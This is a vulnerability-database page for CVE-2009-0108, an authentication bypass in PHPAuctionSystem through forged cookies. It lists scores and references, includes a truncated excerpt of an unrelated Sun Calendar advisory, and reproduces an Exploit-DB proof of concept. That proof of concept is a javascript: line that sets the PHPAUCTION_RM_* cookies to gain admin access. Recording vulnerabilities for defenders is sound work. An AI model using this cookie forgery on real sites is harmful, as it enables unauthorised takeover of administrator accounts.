CVE-2009-0108
published 2009-01-09CVE-2009-0108: PHPAuctions (aka PHPAuctionSystem) allows remote attackers to bypass authentication and gain administrative access via modified (1) PHPAUCTION_RM_ID, (2)…
PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.55%
83.1th percentile
PHPAuctions (aka PHPAuctionSystem) allows remote attackers to bypass authentication and gain administrative access via modified (1) PHPAUCTION_RM_ID, (2) PHPAUCTION_RM_NAME, (3) PHPAUCTION_RM_USERNAME, and (4) PHPAUCTION_RM_EMAIL cookies.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpauctions | phpauctions | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sun Calendar Express Web Server - Denial of Service / Cross-Site Scripting
exploitdb·2009-03-31
Sun Calendar Express Web Server - Denial of Service / Cross-Site Scripting
Sun Calendar Express Web Server - Denial of Service / Cross-Site Scripting
---
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in Sun Calendar Express Web Server
1. *Advisory Information*
Title: Multiple vulnerabilities in Sun Calendar Express Web Server
Advisory ID: CORE-2009-0108
Advisory URL: http://www.coresecurity.com/content/sun-calendar-express
Date published: 2009-03-31
Date of last update: 2009-03-31
Vendors contacted: Sun Microsystems
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS), Cross site scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 34150, 34152, 34153
CVE Name: N/A
3. *Vulnerability Description*
Several vulnerabilities h
Exploit-DB
PHPAuctionSystem - Insecure Cookie Handling
exploitdb·2009-01-05
CVE-2009-0108 PHPAuctionSystem - Insecure Cookie Handling
PHPAuctionSystem - Insecure Cookie Handling
---
[~] PHPAuctionSystem Insecure Cookie Handling Vuln.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 05.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------
javascript:document.cookie = "PHPAUCTION_RM_ID=[ID]; path=/"; document.cookie = "PHPAUCTION_RM_NAME=[Real_name]; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=[User_name]; path=/"; "PHPAUCTION_RM_EMAIL=[email]; path=/";
exp for demo: ( username: sallama )
javascript:document.co
No writeups or analysis indexed.
http://osvdb.org/51146http://secunia.com/advisories/33331http://securityreason.com/securityalert/4891http://www.securityfocus.com/bid/33120https://www.exploit-db.com/exploits/7674http://osvdb.org/51146http://secunia.com/advisories/33331http://securityreason.com/securityalert/4891http://www.securityfocus.com/bid/33120https://www.exploit-db.com/exploits/7674
2009-01-09
Published